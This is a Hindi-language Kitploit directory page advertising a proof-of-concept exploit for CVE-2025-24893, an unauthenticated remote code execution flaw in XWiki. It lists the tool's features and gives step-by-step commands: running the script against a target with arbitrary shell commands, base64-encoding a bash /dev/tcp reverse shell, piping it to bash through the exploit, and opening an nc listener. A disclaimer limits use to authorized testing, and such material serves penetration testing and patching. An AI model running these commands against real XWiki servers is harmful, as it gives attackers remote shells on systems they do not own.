Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893-PoC — CVE-2025-24893 के लिए प्रमाण-अवधारणा शोषण जो XWiki पर अप्रमाणित रिमोट कोड निष्पादन को सक्षम करता है, जिसमें मनमाना शेल कमांड और पायथन के माध्यम से रिवर्स शेल इंजेक्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/dhiaznaidi/cve-2025-24893-poc
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubdhiaznaidi/cve-2025-24893-poc

CVE-2025-24893-PoC

CVE-2025-24893 के लिए प्रमाण-अवधारणा शोषण जो XWiki पर अप्रमाणित रिमोट कोड निष्पादन को सक्षम करता है, जिसमें मनमाना शेल कमांड और पायथन के माध्यम से रिवर्स शेल इंजेक्शन शामिल है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893 - XWiki दूरस्थ कोड निष्पादन (RCE)

CVE-2025-24893 के लिए एक अद्यतन प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण, जो XWiki में एक महत्वपूर्ण बिना प्रमाणीकरण वाली RCE भेद्यता है। यह संस्करण मूल में सुधार करता है जिससे मनमाना शेल कमांड निष्पादन और स्वच्छ रिवर्स शेल इंजेक्शन की अनुमति मिलती है।

द्वारा: HexHunter404


⚠️ चेतावनी

यह कोड केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इसका उपयोग उन प्रणालियों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।


✨ विशेषताएँ

  • bash -c '<command>' के माध्यम से कमांड निष्पादन का समर्थन करता है
  • रिवर्स शेल का पूर्ण समर्थन (Groovy समस्याओं को बायपास करने के लिए base64 के माध्यम से)
  • कमांड आउटपुट का बेहतर प्रबंधन
  • /xwiki पथ को संरक्षित करता है और रीडायरेक्ट लूप से बचता है

🐍 उपयोग

root@kitploit:~
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"

🐚 रिवर्स शेल प्राप्त करना

. अपने रिवर्स शेल को Base64-एनकोड करें

root@kitploit:~
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64

. PoC का उपयोग करके इसे भेजें

root@kitploit:~
python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"

. अपना लिसनर सेट करें

root@kitploit:~
nc -lvnp 4444

यदि सफल होता है, तो आपको एक शेल मिलेगा

टूल डाउनलोड करें